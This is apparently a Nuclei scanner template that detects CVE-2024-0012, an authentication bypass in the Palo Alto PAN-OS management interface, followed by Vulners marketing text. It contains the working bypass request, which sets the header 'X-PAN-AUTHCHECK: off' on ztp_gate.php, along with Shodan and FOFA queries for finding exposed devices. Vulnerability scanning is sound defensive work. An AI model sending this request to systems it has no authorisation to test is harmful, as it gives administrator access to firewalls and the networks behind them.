id: CVE-2024-0012
info:
name: PAN-OS Management Web Interface - Authentication Bypass
author: johnk3r,watchtowr
severity: critical
description: |
An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities
impact: |
Unauthenticated attackers with network access to the management interface can bypass authentication to gain full administrator privileges, allowing them to tamper with configurations, exploit additional vulnerabilities, and completely compromise the Palo Alto firewall and connected networks.
remediation: |
Upgrade to the latest patched version of PAN-OS as specified in the vendor security advisory.
reference:
- https://security.paloaltonetworks.com/CVE-2024-0012
- https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
- https://nvd.nist.gov/vuln/detail/CVE-2024-0012
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-0012
cwe-id: CWE-306
epss-score: 0.99698
epss-percentile: 0.9995
cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: paloaltonetworks
product: pan-os
fofa-query: icon_hash="-631559155"
shodan-query:
- cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
- http.favicon.hash:"-631559155"
tags: cve,cve2024,paloalto,globalprotect,kev,vkev,vuln
http:
- raw:
- |
GET /php/ztp_gate.php/.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
matchers:
- type: dsl
dsl:
- 'contains_any(body, "<title>Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")'
- 'contains(body, "/scripts/cache/mainui.javascript")'
- 'contains(header, "PHPSESSID=")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100ce73e702ec0a7d9f83518f54af2747fadb21931a7a0023e8ab2e90843d1561df0221009f2b96ce6724306bb1595888c95d8a12cca1f2fadacadab954a630efbbf624c6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation